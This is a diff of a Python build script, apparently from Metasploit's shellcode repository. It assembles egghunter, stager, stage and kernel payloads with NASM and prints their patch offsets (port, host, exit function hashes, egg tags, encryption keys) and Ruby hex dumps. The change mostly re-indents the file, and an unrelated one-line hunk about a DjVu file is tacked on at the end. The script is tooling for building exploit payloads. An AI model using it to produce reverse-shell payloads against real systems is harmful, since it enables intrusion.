-  xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
-  xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" )     # hostname filler
-  xmit_offset( data, "RetryCounter", "\x6a\x05" )     # socket retry
-  xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) )  # Filler
-  xmit_offset( data, "Hostname", "https" )
-  xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
-  xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
-  xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
-  xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
-  xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) )  # Egg tag 1
-  xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) )  # Egg tag 2
-  xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) )   # Egg tag size
-  xmit_offset( data, "RC4Key", "RC4KeyMetasploit")          # RC4 key
-  xmit_offset( data, "XORKey", "XORK")                      # XOR key
-  if( name.find( "egghunter" ) >= 0 ):
-	  null_count = data.count( "\x00" )
-	  if( null_count > 0 ):
-		print "# Note: %d NULL bytes found." % ( null_count )
-  if dump_ruby:
-    xmit_dump_ruby( data )
 #=============================================================================#
-def main( argv=None ):
-  if not argv:
-    argv = sys.argv
-  try:
-    if len( argv ) == 1:
-      print "Usage: build.py [clean|all|<name>]"
-    else:
-      print "# Built on %s\n" % (  time.asctime( time.localtime() ) )
-      if argv[1] == "clean":
-        clean()
-      elif argv[1] == "all":
-        for root, dirs, files in os.walk( "./src/egghunter/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/migrate/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/single/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/stage/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/stager/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/kernel/" ):
-          for name in files:
-            build( name[:-4] )
-      else:
-        build( argv[1] )
-  except Exception, e:
-    print "[-] ", e
-#=============================================================================#
-if __name__ == "__main__":
-  main()
+# A simple python build script to build the singles/stages/stagers and
+# some usefull information such as offsets and a hex dump. The binary output
+# will be placed in the bin directory. A hex string and usefull comments will
+# be printed to screen.
+#
+# Example:
+#     >python build.py stager_reverse_tcp_nx
+#
+# Example, to build everything:
+#     >python build.py all > build_output.txt
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 #=============================================================================#
+import os, sys, time
+from subprocess import Popen
+from struct import pack
+#=============================================================================#
+def clean( dir="./bin/" ):
+	for root, dirs, files in os.walk( dir ):
+		for name in files:
+			os.remove( os.path.join( root, name ) )
+#=============================================================================#
+def locate( src_file, dir="./src/" ):
+	for root, dirs, files in os.walk( dir ):
+		for name in files:
+			if src_file == name:
+				return root
+	return None

+#=============================================================================#
+def build( name ):
+	location = locate( "%s.asm" % name )
+	if location:
+		input = os.path.normpath( os.path.join( location, name ) )
+		output = os.path.normpath( os.path.join( "./bin/", name ) )
+		p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
+		p.wait()
+		xmit( name )
+	else:
+		print "[-] Unable to locate '%s.asm' in the src directory" % name
+
+#=============================================================================#
+def xmit_dump_ruby( data, length=16 ):
+	dump = ""
+	for i in xrange( 0, len( data ), length ):
+		bytes = data[ i : i+length ]
+		hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
+		if i+length <= len(data):
+			hex += " +"
+		dump += "%s\n" % ( hex )
+	print dump
+
+#=============================================================================#
+def xmit_offset( data, name, value, match_offset=0 ):
+	offset = data.find( value );
+	if offset != -1:
+		print "# %s Offset: %d" % ( name, offset + match_offset )
+
+#=============================================================================#
+def xmit( name, dump_ruby=True ):
+	bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
+	f = open( bin, 'rb')
+	data = f.read()
+	print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
+	xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
+	xmit_offset( data, "LEPort", pack( "<H", 4444 ) )         # 4444
+	xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
+	xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
+	xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
+	xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" )     # hostname filler
+	xmit_offset( data, "RetryCounter", "\x6a\x05", 1 )     # socket retry
+	xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) )  # Filler
+	xmit_offset( data, "Hostname", "https" )
+	xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
+	xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
+	xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
+	xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
+	xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) )  # Egg tag 1
+	xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) )  # Egg tag 2
+	xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) )   # Egg tag size
+	xmit_offset( data, "RC4Key", "RC4KeyMetasploit")          # RC4 key
+	xmit_offset( data, "XORKey", "XORK")                      # XOR key
+	if( name.find( "egghunter" ) >= 0 ):
+		null_count = data.count( "\x00" )
+		if( null_count > 0 ):
+			print "# Note: %d NULL bytes found." % ( null_count )
+	if dump_ruby:
+		xmit_dump_ruby( data )
+
+#=============================================================================#
+def main( argv=None ):
+	if not argv:
+		argv = sys.argv
+	try:
+		if len( argv ) == 1:
+			print "Usage: build.py [clean|all|<name>]"
+		else:
+			print "# Built on %s\n" % (  time.asctime( time.localtime() ) )
+			if argv[1] == "clean":
+				clean()
+			elif argv[1] == "all":
+				for root, dirs, files in os.walk( "./src/egghunter/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/migrate/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/single/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/stage/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/stager/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/kernel/" ):
+					for name in files:
+						build( name[:-4] )
+			else:
+				build( argv[1] )
+	except Exception, e:
+		print "[-] ", e
+#=============================================================================#
+if __name__ == "__main__":
+  main()
+#=============================================================================#
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1 @@`
				`Any DjVu file can be used this is just a snazzy Metasploit one`